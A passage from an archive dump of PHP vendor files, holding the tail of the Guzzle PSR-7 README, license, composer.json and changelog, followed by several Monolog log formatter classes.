$key): UriInterface` Creates a new URI with a specific query string value removed. Any existing query string values that exactly match the provided key are removed. ## Cross-Origin Detection `GuzzleHttp\Psr7\UriComparator` provides methods to determine if a modified URL should be considered cross-origin. ### `GuzzleHttp\Psr7\UriComparator::isCrossOrigin` `public static function isCrossOrigin(UriInterface $original, UriInterface $modified): bool` Determines if a modified URL should be considered cross-origin with respect to an original URL. ## Reference Resolution `GuzzleHttp\Psr7\UriResolver` provides methods to resolve a URI reference in the context of a base URI according to [RFC 3986 Section 5](https://datatracker.ietf.org/doc/html/rfc3986#section-5). This is for example also what web browsers do when resolving a link in a website based on the current request URI. ### `GuzzleHttp\Psr7\UriResolver::resolve` `public static function resolve(UriInterface $base, UriInterface $rel): UriInterface` Converts the relative URI into a new URI that is resolved against the base URI. ### `GuzzleHttp\Psr7\UriResolver::removeDotSegments` `public static function removeDotSegments(string $path): string` Removes dot segments from a path and returns the new path according to [RFC 3986 Section 5.2.4](https://datatracker.ietf.org/doc/html/rfc3986#section-5.2.4). ### `GuzzleHttp\Psr7\UriResolver::relativize` `public static function relativize(UriInterface $base, UriInterface $target): UriInterface` Returns the target URI as a relative reference from the base URI. This method is the counterpart to resolve(): ```php (string) $target === (string) UriResolver::resolve($base, UriResolver::relativize($base, $target)) ``` One use-case is to use the current request URI as base URI and then generate relative links in your documents to reduce the document size or offer self-contained downloadable document archives. ```php $base = new Uri('http://example.com/a/b/'); echo UriResolver::relativize($base, new Uri('http://example.com/a/b/c')); // prints 'c'. echo UriResolver::relativize($base, new Uri('http://example.com/a/x/y')); // prints '../x/y'. echo UriResolver::relativize($base, new Uri('http://example.com/a/b/?q')); // prints '?q'. echo UriResolver::relativize($base, new Uri('http://example.org/a/b/')); // prints '//example.org/a/b/'. ``` ## Normalization and Comparison `GuzzleHttp\Psr7\UriNormalizer` provides methods to normalize and compare URIs according to [RFC 3986 Section 6](https://datatracker.ietf.org/doc/html/rfc3986#section-6). ### `GuzzleHttp\Psr7\UriNormalizer::normalize` `public static function normalize(UriInterface $uri, $flags = self::PRESERVING_NORMALIZATIONS): UriInterface` Returns a normalized URI. The scheme and host component are already normalized to lowercase per PSR-7 UriInterface. This methods adds additional normalizations that can be configured with the `$flags` parameter which is a bitmask of normalizations to apply. The following normalizations are available: - `UriNormalizer::PRESERVING_NORMALIZATIONS` Default normalizations which only include the ones that preserve semantics. - `UriNormalizer::CAPITALIZE_PERCENT_ENCODING` All letters within a percent-encoding triplet (e.g., "%3A") are case-insensitive, and should be capitalized. Example: `http://example.org/a%c2%b1b` → `http://example.org/a%C2%B1b` - `UriNormalizer::DECODE_UNRESERVED_CHARACTERS` Decodes percent-encoded octets of unreserved characters. For consistency, percent-encoded octets in the ranges of ALPHA (%41–%5A and %61–%7A), DIGIT (%30–%39), hyphen (%2D), period (%2E), underscore (%5F), or tilde (%7E) should not be created by URI producers and, when found in a URI, should be decoded to their corresponding unreserved characters by URI normalizers. Example: `http://example.org/%7Eusern%61me/` → `http://example.org/~username/` - `UriNormalizer::CONVERT_EMPTY_PATH` Converts the empty path to "/" for http and https URIs. Example: `http://example.org` → `http://example.org/` - `UriNormalizer::REMOVE_DEFAULT_HOST` Removes the default host of the given URI scheme from the URI. Only the "file" scheme defines the default host "localhost". All of `file:/myfile`, `file:///myfile`, and `file://localhost/myfile` are equivalent according to RFC 3986. Example: `file://localhost/myfile` → `file:///myfile` - `UriNormalizer::REMOVE_DEFAULT_PORT` Removes the default port of the given URI scheme from the URI. Example: `http://example.org:80/` → `http://example.org/` - `UriNormalizer::REMOVE_DOT_SEGMENTS` Removes unnecessary dot-segments. Dot-segments in relative-path references are not removed as it would change the semantics of the URI reference. Example: `http://example.org/../a/b/../c/./d.html` → `http://example.org/a/c/d.html` - `UriNormalizer::REMOVE_DUPLICATE_SLASHES` Paths which include two or more adjacent slashes are converted to one. Webservers usually ignore duplicate slashes and treat those URIs equivalent. But in theory those URIs do not need to be equivalent. So this normalization may change the semantics. Encoded slashes (%2F) are not removed. Example: `http://example.org//foo///bar.html` → `http://example.org/foo/bar.html` - `UriNormalizer::SORT_QUERY_PARAMETERS` Sort query parameters with their values in alphabetical order. However, the order of parameters in a URI may be significant (this is not defined by the standard). So this normalization is not safe and may change the semantics of the URI. Example: `?lang=en&article=fred` → `?article=fred&lang=en` ### `GuzzleHttp\Psr7\UriNormalizer::isEquivalent` `public static function isEquivalent(UriInterface $uri1, UriInterface $uri2, $normalizations = self::PRESERVING_NORMALIZATIONS): bool` Whether two URIs can be considered equivalent. Both URIs are normalized automatically before comparison with the given `$normalizations` bitmask. The method also accepts relative URI references and returns true when they are equivalent. This of course assumes they will be resolved against the same base URI. If this is not the case, determination of equivalence or difference of relative references does not mean anything. ## Security If you discover a security vulnerability within this package, please send an email to security@tidelift.com. All security vulnerabilities will be promptly addressed. Please do not disclose security-related issues publicly until a fix has been announced. Please see [Security Policy](https://github.com/guzzle/psr7/security/policy) for more information. ## License Guzzle is made available under the MIT License (MIT). Please see [License File](LICENSE) for more information. ## For Enterprise Available as part of the Tidelift Subscription The maintainers of Guzzle and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. [Learn more.](https://tidelift.com/subscription/pkg/packagist-guzzlehttp-psr7?utm_source=packagist-guzzlehttp-psr7&utm_medium=referral&utm_campaign=enterprise&utm_term=repo) google-api/vendor/guzzlehttp/psr7/LICENSE000064400000002572147600400120014204 0ustar00The MIT License (MIT) Copyright (c) 2015 Michael Dowling Copyright (c) 2015 Márk Sági-Kazár Copyright (c) 2015 Graham Campbell Copyright (c) 2016 Tobias Schultze Copyright (c) 2016 George Mponos Copyright (c) 2018 Tobias Nyholm Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. google-api/vendor/guzzlehttp/psr7/composer.json000064400000004754147600400120015725 0ustar00;{ "name": "guzzlehttp/psr7", "description": "PSR-7 message implementation that also provides common utility methods", "keywords": [ "request", "response", "message", "stream", "http", "uri", "url", "psr-7" ], "license": "MIT", "authors": [ { "name": "Graham Campbell", "email": "hello@gjcampbell.co.uk", "homepage": "https://github.com/GrahamCampbell" }, { "name": "Michael Dowling", "email": "mtdowling@gmail.com", "homepage": "https://github.com/mtdowling" }, { "name": "George Mponos", "email": "gmponos@gmail.com", "homepage": "https://github.com/gmponos" }, { "name": "Tobias Nyholm", "email": "tobias.nyholm@gmail.com", "homepage": "https://github.com/Nyholm" }, { "name": "Márk Sági-Kazár", "email": "mark.sagikazar@gmail.com", "homepage": "https://github.com/sagikazarmark" }, { "name": "Tobias Schultze", "email": "webmaster@tubo-world.de", "homepage": "https://github.com/Tobion" }, { "name": "Márk Sági-Kazár", "email": "mark.sagikazar@gmail.com", "homepage": "https://sagikazarmark.hu" } ], "require": { "php": "^7.2.5 || ^8.0", "psr/http-factory": "^1.0", "psr/http-message": "^1.1 || ^2.0", "ralouphie/getallheaders": "^3.0" }, "provide": { "psr/http-factory-implementation": "1.0", "psr/http-message-implementation": "1.0" }, "require-dev": { "bamarni/composer-bin-plugin": "^1.8.2", "http-interop/http-factory-tests": "^0.9", "phpunit/phpunit": "^8.5.36 || ^9.6.15" }, "suggest": { "laminas/laminas-httphandlerrunner": "Emit PSR-7 responses" }, "autoload": { "psr-4": { "GuzzleHttp\\Psr7\\": "src/" } }, "autoload-dev": { "psr-4": { "GuzzleHttp\\Tests\\Psr7\\": "tests/" } }, "extra": { "bamarni-bin": { "bin-links": true, "forward-command": false } }, "config": { "allow-plugins": { "bamarni/composer-bin-plugin": true }, "preferred-install": "dist", "sort-packages": true } }google-api/vendor/guzzlehttp/psr7/CHANGELOG.md000064400000025750147600400120015013 0ustar00# Change Log All notable changes to this project will be documented in this file. The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/) and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). ## 2.6.2 - 2023-12-03 ### Fixed - Fixed another issue with the fact that PHP transforms numeric strings in array keys to ints ### Changed - Updated links in docs to their canonical versions - Replaced `call_user_func*` with native calls ## 2.6.1 - 2023-08-27 ### Fixed - Properly handle the fact that PHP transforms numeric strings in array keys to ints ## 2.6.0 - 2023-08-03 ### Changed - Updated the mime type map to add some new entries, fix a couple of invalid entries, and remove an invalid entry - Fallback to `application/octet-stream` if we are unable to guess the content type for a multipart file upload ## 2.5.1 - 2023-08-03 ### Fixed - Corrected mime type for `.acc` files to `audio/aac` ### Changed - PHP 8.3 support ## 2.5.0 - 2023-04-17 ### Changed - Adjusted `psr/http-message` version constraint to `^1.1 || ^2.0` ## 2.4.5 - 2023-04-17 ### Fixed - Prevent possible warnings on unset variables in `ServerRequest::normalizeNestedFileSpec` - Fixed `Message::bodySummary` when `preg_match` fails - Fixed header validation issue ## 2.4.4 - 2023-03-09 ### Changed - Removed the need for `AllowDynamicProperties` in `LazyOpenStream` ## 2.4.3 - 2022-10-26 ### Changed - Replaced `sha1(uniqid())` by `bin2hex(random_bytes(20))` ## 2.4.2 - 2022-10-25 ### Fixed - Fixed erroneous behaviour when combining host and relative path ## 2.4.1 - 2022-08-28 ### Fixed - Rewind body before reading in `Message::bodySummary` ## 2.4.0 - 2022-06-20 ### Added - Added provisional PHP 8.2 support - Added `UriComparator::isCrossOrigin` method ## 2.3.0 - 2022-06-09 ### Fixed - Added `Header::splitList` method - Added `Utils::tryGetContents` method - Improved `Stream::getContents` method - Updated mimetype mappings ## 2.2.2 - 2022-06-08 ### Fixed - Fix `Message::parseRequestUri` for numeric headers - Re-wrap exceptions thrown in `fread` into runtime exceptions - Throw an exception when multipart options is misformatted ## 2.2.1 - 2022-03-20 ### Fixed - Correct header value validation ## 2.2.0 - 2022-03-20 ### Added - A more compressive list of mime types - Add JsonSerializable to Uri - Missing return types ### Fixed - Bug MultipartStream no `uri` metadata - Bug MultipartStream with filename for `data://` streams - Fixed new line handling in MultipartStream - Reduced RAM usage when copying streams - Updated parsing in `Header::normalize()` ## 2.1.1 - 2022-03-20 ### Fixed - Validate header values properly ## 2.1.0 - 2021-10-06 ### Changed - Attempting to create a `Uri` object from a malformed URI will no longer throw a generic `InvalidArgumentException`, but rather a `MalformedUriException`, which inherits from the former for backwards compatibility. Callers relying on the exception being thrown to detect invalid URIs should catch the new exception. ### Fixed - Return `null` in caching stream size if remote size is `null` ## 2.0.0 - 2021-06-30 Identical to the RC release. ## 2.0.0@RC-1 - 2021-04-29 ### Fixed - Handle possibly unset `url` in `stream_get_meta_data` ## 2.0.0@beta-1 - 2021-03-21 ### Added - PSR-17 factories - Made classes final - PHP7 type hints ### Changed - When building a query string, booleans are represented as 1 and 0. ### Removed - PHP < 7.2 support - All functions in the `GuzzleHttp\Psr7` namespace ## 1.8.1 - 2021-03-21 ### Fixed - Issue parsing IPv6 URLs - Issue modifying ServerRequest lost all its attributes ## 1.8.0 - 2021-03-21 ### Added - Locale independent URL parsing - Most classes got a `@final` annotation to prepare for 2.0 ### Fixed - Issue when creating stream from `php://input` and curl-ext is not installed - Broken `Utils::tryFopen()` on PHP 8 ## 1.7.0 - 2020-09-30 ### Added - Replaced functions by static methods ### Fixed - Converting a non-seekable stream to a string - Handle multiple Set-Cookie correctly - Ignore array keys in header values when merging - Allow multibyte characters to be parsed in `Message:bodySummary()` ### Changed - Restored partial HHVM 3 support ## [1.6.1] - 2019-07-02 ### Fixed - Accept null and bool header values again ## [1.6.0] - 2019-06-30 ### Added - Allowed version `^3.0` of `ralouphie/getallheaders` dependency (#244) - Added MIME type for WEBP image format (#246) - Added more validation of values according to PSR-7 and RFC standards, e.g. status code range (#250, #272) ### Changed - Tests don't pass with HHVM 4.0, so HHVM support got dropped. Other libraries like composer have done the same. (#262) - Accept port number 0 to be valid (#270) ### Fixed - Fixed subsequent reads from `php://input` in ServerRequest (#247) - Fixed readable/writable detection for certain stream modes (#248) - Fixed encoding of special characters in the `userInfo` component of an URI (#253) ## [1.5.2] - 2018-12-04 ### Fixed - Check body size when getting the message summary ## [1.5.1] - 2018-12-04 ### Fixed - Get the summary of a body only if it is readable ## [1.5.0] - 2018-12-03 ### Added - Response first-line to response string exception (fixes #145) - A test for #129 behavior - `get_message_body_summary` function in order to get the message summary - `3gp` and `mkv` mime types ### Changed - Clarify exception message when stream is detached ### Deprecated - Deprecated parsing folded header lines as per RFC 7230 ### Fixed - Fix `AppendStream::detach` to not close streams - `InflateStream` preserves `isSeekable` attribute of the underlying stream - `ServerRequest::getUriFromGlobals` to support URLs in query parameters Several other fixes and improvements. ## [1.4.2] - 2017-03-20 ### Fixed - Reverted BC break to `Uri::resolve` and `Uri::removeDotSegments` by removing calls to `trigger_error` when deprecated methods are invoked. ## [1.4.1] - 2017-02-27 ### Added - Rriggering of silenced deprecation warnings. ### Fixed - Reverted BC break by reintroducing behavior to automagically fix a URI with a relative path and an authority by adding a leading slash to the path. It's only deprecated now. ## [1.4.0] - 2017-02-21 ### Added - Added common URI utility methods based on RFC 3986 (see documentation in the readme): - `Uri::isDefaultPort` - `Uri::isAbsolute` - `Uri::isNetworkPathReference` - `Uri::isAbsolutePathReference` - `Uri::isRelativePathReference` - `Uri::isSameDocumentReference` - `Uri::composeComponents` - `UriNormalizer::normalize` - `UriNormalizer::isEquivalent` - `UriResolver::relativize` ### Changed - Ensure `ServerRequest::getUriFromGlobals` returns a URI in absolute form. - Allow `parse_response` to parse a response without delimiting space and reason. - Ensure each URI modification results in a valid URI according to PSR-7 discussions. Invalid modifications will throw an exception instead of returning a wrong URI or doing some magic. - `(new Uri)->withPath('foo')->withHost('example.com')` will throw an exception because the path of a URI with an authority must start with a slash "/" or be empty - `(new Uri())->withScheme('http')` will return `'http://localhost'` ### Deprecated - `Uri::resolve` in favor of `UriResolver::resolve` - `Uri::removeDotSegments` in favor of `UriResolver::removeDotSegments` ### Fixed - `Stream::read` when length parameter <= 0. - `copy_to_stream` reads bytes in chunks instead of `maxLen` into memory. - `ServerRequest::getUriFromGlobals` when `Host` header contains port. - Compatibility of URIs with `file` scheme and empty host. ## [1.3.1] - 2016-06-25 ### Fixed - `Uri::__toString` for network path references, e.g. `//example.org`. - Missing lowercase normalization for host. - Handling of URI components in case they are `'0'` in a lot of places, e.g. as a user info password. - `Uri::withAddedHeader` to correctly merge headers with different case. - Trimming of header values in `Uri::withAddedHeader`. Header values may be surrounded by whitespace which should be ignored according to RFC 7230 Section 3.2.4. This does not apply to header names. - `Uri::withAddedHeader` with an array of header values. - `Uri::resolve` when base path has no slash and handling of fragment. - Handling of encoding in `Uri::with(out)QueryValue` so one can pass the key/value both in encoded as well as decoded form to those methods. This is consistent with withPath, withQuery etc. - `ServerRequest::withoutAttribute` when attribute value is null. ## [1.3.0] - 2016-04-13 ### Added - Remaining interfaces needed for full PSR7 compatibility (ServerRequestInterface, UploadedFileInterface, etc.). - Support for stream_for from scalars. ### Changed - Can now extend Uri. ### Fixed - A bug in validating request methods by making it more permissive. ## [1.2.3] - 2016-02-18 ### Fixed - Support in `GuzzleHttp\Psr7\CachingStream` for seeking forward on remote streams, which can sometimes return fewer bytes than requested with `fread`. - Handling of gzipped responses with FNAME headers. ## [1.2.2] - 2016-01-22 ### Added - Support for URIs without any authority. - Support for HTTP 451 'Unavailable For Legal Reasons.' - Support for using '0' as a filename. - Support for including non-standard ports in Host headers. ## [1.2.1] - 2015-11-02 ### Changes - Now supporting negative offsets when seeking to SEEK_END. ## [1.2.0] - 2015-08-15 ### Changed - Body as `"0"` is now properly added to a response. - Now allowing forward seeking in CachingStream. - Now properly parsing HTTP requests that contain proxy targets in `parse_request`. - functions.php is now conditionally required. - user-info is no longer dropped when resolving URIs. ## [1.1.0] - 2015-06-24 ### Changed - URIs can now be relative. - `multipart/form-data` headers are now overridden case-insensitively. - URI paths no longer encode the following characters because they are allowed in URIs: "(", ")", "*", "!", "'" - A port is no longer added to a URI when the scheme is missing and no port is present. ## 1.0.0 - 2015-05-19 Initial release. Currently unsupported: - `Psr\Http\Message\ServerRequestInterface` - `Psr\Http\Message\UploadedFileInterface` [1.6.0]: https://github.com/guzzle/psr7/compare/1.5.2...1.6.0 [1.5.2]: https://github.com/guzzle/psr7/compare/1.5.1...1.5.2 [1.5.1]: https://github.com/guzzle/psr7/compare/1.5.0...1.5.1 [1.5.0]: https://github.com/guzzle/psr7/compare/1.4.2...1.5.0 [1.4.2]: https://github.com/guzzle/psr7/compare/1.4.1...1.4.2 [1.4.1]: https://github.com/guzzle/psr7/compare/1.4.0...1.4.1 [1.4.0]: https://github.com/guzzle/psr7/compare/1.3.1...1.4.0 [1.3.1]: https://github.com/guzzle/psr7/compare/1.3.0...1.3.1 [1.3.0]: https://github.com/guzzle/psr7/compare/1.2.3...1.3.0 [1.2.3]: https://github.com/guzzle/psr7/compare/1.2.2...1.2.3 [1.2.2]: https://github.com/guzzle/psr7/compare/1.2.1...1.2.2 [1.2.1]: https://github.com/guzzle/psr7/compare/1.2.0...1.2.1 [1.2.0]: https://github.com/guzzle/psr7/compare/1.1.0...1.2.0 [1.1.0]: https://github.com/guzzle/psr7/compare/1.0.0...1.1.0 google-api/vendor/monolog/monolog/src/Monolog/Attribute/AsMonologProcessor.php000064400000002771147600400120023664 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Attribute; /** * A reusable attribute to help configure a class or a method as a processor. * * Using it offers no guarantee: it needs to be leveraged by a Monolog third-party consumer. * * Using it with the Monolog library only has no effect at all: processors should still be turned into a callable if * needed and manually pushed to the loggers and to the processable handlers. */ #[\Attribute(\Attribute::TARGET_CLASS | \Attribute::TARGET_METHOD | \Attribute::IS_REPEATABLE)] class AsMonologProcessor { /** @var string|null */ public $channel = null; /** @var string|null */ public $handler = null; /** @var string|null */ public $method = null; /** * @param string|null $channel The logging channel the processor should be pushed to. * @param string|null $handler The handler the processor should be pushed to. * @param string|null $method The method that processes the records (if the attribute is used at the class level). */ public function __construct( ?string $channel = null, ?string $handler = null, ?string $method = null ) { $this->channel = $channel; $this->handler = $handler; $this->method = $method; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/ChromePHPFormatter.php000064400000004140147600400120023527 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Monolog\Logger; /** * Formats a log message according to the ChromePHP array format * * @author Christophe Coevoet */ class ChromePHPFormatter implements FormatterInterface { /** * Translates Monolog log levels to Wildfire levels. * * @var array */ private $logLevels = [ Logger::DEBUG => 'log', Logger::INFO => 'info', Logger::NOTICE => 'info', Logger::WARNING => 'warn', Logger::ERROR => 'error', Logger::CRITICAL => 'error', Logger::ALERT => 'error', Logger::EMERGENCY => 'error', ]; /** * {@inheritDoc} */ public function format(array $record) { // Retrieve the line and file if set and remove them from the formatted extra $backtrace = 'unknown'; if (isset($record['extra']['file'], $record['extra']['line'])) { $backtrace = $record['extra']['file'].' : '.$record['extra']['line']; unset($record['extra']['file'], $record['extra']['line']); } $message = ['message' => $record['message']]; if ($record['context']) { $message['context'] = $record['context']; } if ($record['extra']) { $message['extra'] = $record['extra']; } if (count($message) === 1) { $message = reset($message); } return [ $record['channel'], $message, $backtrace, $this->logLevels[$record['level']], ]; } /** * {@inheritDoc} */ public function formatBatch(array $records) { $formatted = []; foreach ($records as $record) { $formatted[] = $this->format($record); } return $formatted; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/ElasticaFormatter.php000064400000004030147600400120023465 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Elastica\Document; /** * Format a log message into an Elastica Document * * @author Jelle Vink * * @phpstan-import-type Record from \Monolog\Logger */ class ElasticaFormatter extends NormalizerFormatter { /** * @var string Elastic search index name */ protected $index; /** * @var ?string Elastic search document type */ protected $type; /** * @param string $index Elastic Search index name * @param ?string $type Elastic Search document type, deprecated as of Elastica 7 */ public function __construct(string $index, ?string $type) { // elasticsearch requires a ISO 8601 format date with optional millisecond precision. parent::__construct('Y-m-d\TH:i:s.uP'); $this->index = $index; $this->type = $type; } /** * {@inheritDoc} */ public function format(array $record) { $record = parent::format($record); return $this->getDocument($record); } public function getIndex(): string { return $this->index; } /** * @deprecated since Elastica 7 type has no effect */ public function getType(): string { /** @phpstan-ignore-next-line */ return $this->type; } /** * Convert a log message into an Elastica Document * * @phpstan-param Record $record */ protected function getDocument(array $record): Document { $document = new Document(); $document->setData($record); if (method_exists($document, 'setType')) { /** @phpstan-ignore-next-line */ $document->setType($this->type); } $document->setIndex($this->index); return $document; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/ElasticsearchFormatter.php000064400000003505147600400120024520 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use DateTimeInterface; /** * Format a log message into an Elasticsearch record * * @author Avtandil Kikabidze */ class ElasticsearchFormatter extends NormalizerFormatter { /** * @var string Elasticsearch index name */ protected $index; /** * @var string Elasticsearch record type */ protected $type; /** * @param string $index Elasticsearch index name * @param string $type Elasticsearch record type */ public function __construct(string $index, string $type) { // Elasticsearch requires an ISO 8601 format date with optional millisecond precision. parent::__construct(DateTimeInterface::ISO8601); $this->index = $index; $this->type = $type; } /** * {@inheritDoc} */ public function format(array $record) { $record = parent::format($record); return $this->getDocument($record); } /** * Getter index * * @return string */ public function getIndex(): string { return $this->index; } /** * Getter type * * @return string */ public function getType(): string { return $this->type; } /** * Convert a log message into an Elasticsearch record * * @param mixed[] $record Log message * @return mixed[] */ protected function getDocument(array $record): array { $record['_index'] = $this->index; $record['_type'] = $this->type; return $record; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/MongoDBFormatter.php000064400000011554147600400120023236 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use MongoDB\BSON\Type; use MongoDB\BSON\UTCDateTime; use Monolog\Utils; /** * Formats a record for use with the MongoDBHandler. * * @author Florian Plattner */ class MongoDBFormatter implements FormatterInterface { /** @var bool */ private $exceptionTraceAsString; /** @var int */ private $maxNestingLevel; /** @var bool */ private $isLegacyMongoExt; /** * @param int $maxNestingLevel 0 means infinite nesting, the $record itself is level 1, $record['context'] is 2 * @param bool $exceptionTraceAsString set to false to log exception traces as a sub documents instead of strings */ public function __construct(int $maxNestingLevel = 3, bool $exceptionTraceAsString = true) { $this->maxNestingLevel = max($maxNestingLevel, 0); $this->exceptionTraceAsString = $exceptionTraceAsString; $this->isLegacyMongoExt = extension_loaded('mongodb') && version_compare((string) phpversion('mongodb'), '1.1.9', '<='); } /** * {@inheritDoc} * * @return mixed[] */ public function format(array $record): array { /** @var mixed[] $res */ $res = $this->formatArray($record); return $res; } /** * {@inheritDoc} * * @return array */ public function formatBatch(array $records): array { $formatted = []; foreach ($records as $key => $record) { $formatted[$key] = $this->format($record); } return $formatted; } /** * @param mixed[] $array * @return mixed[]|string Array except when max nesting level is reached then a string "[...]" */ protected function formatArray(array $array, int $nestingLevel = 0) { if ($this->maxNestingLevel > 0 && $nestingLevel > $this->maxNestingLevel) { return '[...]'; } foreach ($array as $name => $value) { if ($value instanceof \DateTimeInterface) { $array[$name] = $this->formatDate($value, $nestingLevel + 1); } elseif ($value instanceof \Throwable) { $array[$name] = $this->formatException($value, $nestingLevel + 1); } elseif (is_array($value)) { $array[$name] = $this->formatArray($value, $nestingLevel + 1); } elseif (is_object($value) && !$value instanceof Type) { $array[$name] = $this->formatObject($value, $nestingLevel + 1); } } return $array; } /** * @param mixed $value * @return mixed[]|string */ protected function formatObject($value, int $nestingLevel) { $objectVars = get_object_vars($value); $objectVars['class'] = Utils::getClass($value); return $this->formatArray($objectVars, $nestingLevel); } /** * @return mixed[]|string */ protected function formatException(\Throwable $exception, int $nestingLevel) { $formattedException = [ 'class' => Utils::getClass($exception), 'message' => $exception->getMessage(), 'code' => (int) $exception->getCode(), 'file' => $exception->getFile() . ':' . $exception->getLine(), ]; if ($this->exceptionTraceAsString === true) { $formattedException['trace'] = $exception->getTraceAsString(); } else { $formattedException['trace'] = $exception->getTrace(); } return $this->formatArray($formattedException, $nestingLevel); } protected function formatDate(\DateTimeInterface $value, int $nestingLevel): UTCDateTime { if ($this->isLegacyMongoExt) { return $this->legacyGetMongoDbDateTime($value); } return $this->getMongoDbDateTime($value); } private function getMongoDbDateTime(\DateTimeInterface $value): UTCDateTime { return new UTCDateTime((int) floor(((float) $value->format('U.u')) * 1000)); } /** * This is needed to support MongoDB Driver v1.19 and below * * See https://github.com/mongodb/mongo-php-driver/issues/426 * * It can probably be removed in 2.1 or later once MongoDB's 1.2 is released and widely adopted */ private function legacyGetMongoDbDateTime(\DateTimeInterface $value): UTCDateTime { $milliseconds = floor(((float) $value->format('U.u')) * 1000); $milliseconds = (PHP_INT_SIZE == 8) //64-bit OS? ? (int) $milliseconds : (string) $milliseconds; // @phpstan-ignore-next-line return new UTCDateTime($milliseconds); } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/LogglyFormatter.php000064400000002431147600400120023200 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; /** * Encodes message information into JSON in a format compatible with Loggly. * * @author Adam Pancutt */ class LogglyFormatter extends JsonFormatter { /** * Overrides the default batch mode to new lines for compatibility with the * Loggly bulk API. */ public function __construct(int $batchMode = self::BATCH_MODE_NEWLINES, bool $appendNewline = false) { parent::__construct($batchMode, $appendNewline); } /** * Appends the 'timestamp' parameter for indexing by Loggly. * * @see https://www.loggly.com/docs/automated-parsing/#json * @see \Monolog\Formatter\JsonFormatter::format() */ public function format(array $record): string { if (isset($record["datetime"]) && ($record["datetime"] instanceof \DateTimeInterface)) { $record["timestamp"] = $record["datetime"]->format("Y-m-d\TH:i:s.uO"); unset($record["datetime"]); } return parent::format($record); } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/LogstashFormatter.php000064400000006512147600400120023533 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; /** * Serializes a log message to Logstash Event Format * * @see https://www.elastic.co/products/logstash * @see https://github.com/elastic/logstash/blob/master/logstash-core/src/main/java/org/logstash/Event.java * * @author Tim Mower */ class LogstashFormatter extends NormalizerFormatter { /** * @var string the name of the system for the Logstash log message, used to fill the @source field */ protected $systemName; /** * @var string an application name for the Logstash log message, used to fill the @type field */ protected $applicationName; /** * @var string the key for 'extra' fields from the Monolog record */ protected $extraKey; /** * @var string the key for 'context' fields from the Monolog record */ protected $contextKey; /** * @param string $applicationName The application that sends the data, used as the "type" field of logstash * @param string|null $systemName The system/machine name, used as the "source" field of logstash, defaults to the hostname of the machine * @param string $extraKey The key for extra keys inside logstash "fields", defaults to extra * @param string $contextKey The key for context keys inside logstash "fields", defaults to context */ public function __construct(string $applicationName, ?string $systemName = null, string $extraKey = 'extra', string $contextKey = 'context') { // logstash requires a ISO 8601 format date with optional millisecond precision. parent::__construct('Y-m-d\TH:i:s.uP'); $this->systemName = $systemName === null ? (string) gethostname() : $systemName; $this->applicationName = $applicationName; $this->extraKey = $extraKey; $this->contextKey = $contextKey; } /** * {@inheritDoc} */ public function format(array $record): string { $record = parent::format($record); if (empty($record['datetime'])) { $record['datetime'] = gmdate('c'); } $message = [ '@timestamp' => $record['datetime'], '@version' => 1, 'host' => $this->systemName, ]; if (isset($record['message'])) { $message['message'] = $record['message']; } if (isset($record['channel'])) { $message['type'] = $record['channel']; $message['channel'] = $record['channel']; } if (isset($record['level_name'])) { $message['level'] = $record['level_name']; } if (isset($record['level'])) { $message['monolog_level'] = $record['level']; } if ($this->applicationName) { $message['type'] = $this->applicationName; } if (!empty($record['extra'])) { $message[$this->extraKey] = $record['extra']; } if (!empty($record['context'])) { $message[$this->contextKey] = $record['context']; } return $this->toJson($message) . "\n"; } } google-api/vendor/monolog/monolog/src/Monolog/Formatter/LineFormatter.php000064400000017012147600400120022633 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Formatter; use Monolog\Utils; /** * Formats incoming records into a one-line string * * This is especially useful for logging to files * * @author Jordi Boggiano * @author Christophe Coevoet */ class LineFormatter extends NormalizerFormatter { public const SIMPLE_FORMAT = "[%datetime%] %channel%.%level_name%: %message% %context% %extra%\n"; /** @var string */ protected $format; /** @var bool */ protected $allowInlineLineBreaks; /** @var bool */ protected $ignoreEmptyContextAndExtra; /** @var bool */ protected $includeStacktraces; /** @var ?callable */ protected $stacktracesParser; /** * @param string|null $format The format of the message * @param string|null $dateFormat The format of the timestamp: one supported by DateTime::format * @param bool $allowInlineLineBreaks Whether to allow inline line breaks in log entries * @param bool $ignoreEmptyContextAndExtra */ public function __construct(?string $format = null, ?string $dateFormat = null, bool $allowInlineLineBreaks = false, bool $ignoreEmptyContextAndExtra = false, bool $includeStacktraces = false) { $this->format = $format === null ? 